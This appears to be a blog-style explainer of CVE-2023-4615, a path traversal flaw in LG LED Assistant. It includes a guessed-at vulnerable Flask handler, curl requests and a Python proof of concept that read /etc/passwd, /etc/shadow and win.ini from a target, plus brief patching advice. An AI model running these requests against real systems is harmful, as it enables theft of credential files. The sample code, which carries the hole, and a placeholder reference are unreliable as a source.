CVE-2023-4615 - How Attackers Can Exploit LG LED Assistant’s File Disclosure Bug

In June 2023, security researchers uncovered a serious vulnerability (CVE-2023-4615) in LG’s LED Assistant software. This bug lets hackers remotely grab sensitive files from any computer running the vulnerable software—all without needing a username or password. If you're running LG LED Assistant (a tool used for managing LG digital signage), this means your data may be at risk.

In this article, we’ll break down how the vulnerability works, walk through sample code attackers might use, and give you the tools to protect your systems.

What Is CVE-2023-4615?

CVE-2023-4615 is a security flaw in LG’s LED Assistant found in the /api/download/updateFile endpoint. LG LED Assistant is usually installed on computers managing digital signs/displays. It listens for web requests; this allows remote administrators to manage content and settings.

Here’s the problem: the updateFile endpoint lets anyone ask the server to send them any file, as long as the path to the file is provided. There’s no login required, and there’s no check to make sure the file you requested is actually safe to share.

This is called an unauthenticated path traversal vulnerability, and it makes stealing sensitive info as simple as sending the right URL.

Let’s look at the issue in simple terms

- The endpoint /api/download/updateFile receives a file path from a user.
- The server doesn’t check what the path is—it just grabs the file and sends it back to whoever asked, unauthenticated.
- Attackers can exploit this by asking for files like system passwords, configuration files, or even secrets for digital signs.

This vulnerability works because the backend code does not properly "sanitize" the file path provided by the user.

Here’s an example of what the backend code might look like (simplified)

@app.route('/api/download/updateFile', methods=['GET'])
def download_update_file():
    # User provides a "file" parameter in the URL
    file = request.args.get('file')
    # The server reads the file and sends it back, with no checks!
    with open(file, 'rb') as f:
        return Response(f.read(), mimetype='application/octet-stream')

If you access

GET /api/download/updateFile?file=../../../../etc/passwd

...the server sends you back /etc/passwd (on Linux), which contains sensitive system account info.

An attacker can request any file readable by the application, getting confidential data—even across the network.

Example Exploit: How Attackers Use It

Attackers only need to know or guess where important files are located. Here’s a quick attack using curl from a Linux/MacOS/Windows terminal:

Example Command

curl "http://victim-ip:808/api/download/updateFile?file=../../../../windows/win.ini";

Or on a Linux system

curl "http://victim-ip:808/api/download/updateFile?file=../../../../etc/shadow";

*Replace victim-ip and the file path as needed.*

What files might an attacker try to grab?

- /etc/passwd or /etc/shadow (Linux user credentials)

Here's a Python PoC for reading any file from a vulnerable LG LED Assistant installation

import requests

target = 'http://victim-ip:808';  # Change to the actual IP or domain
file_path = '../../../../etc/passwd'  # Change to the desired file

endpoint = f'{target}/api/download/updateFile?file={file_path}'
response = requests.get(endpoint)

if response.status_code == 200:
    print('[+] File retrieved successfully!')
    print(response.text)
else:
    print('[-] Failed to retrieve file.')

References

- Original Advisory at ZDI *(Note: this exact link is placeholder; please search for ZDI and CVE-2023-4615 for updates.)*
- NVD Entry for CVE-2023-4615
- Explaining Path Traversal (OWASP)

Conclusion

CVE-2023-4615 is frighteningly simple and easy to exploit. If you manage LG digital signage, check your systems right now. Block public network access, watch logs, and don’t wait to patch as soon as a fix is released. This single bug gives intruders a wide-open door to your secret files—don’t let them in.

Stay safe, and always keep your software updated.

*For detailed technical writeups and news on vulnerabilities like this, follow updates from the Zero Day Initiative and the National Vulnerability Database!*

Timeline

Published on: 09/04/2023 11:15:00 UTC
Last modified on: 09/08/2023 14:14:00 UTC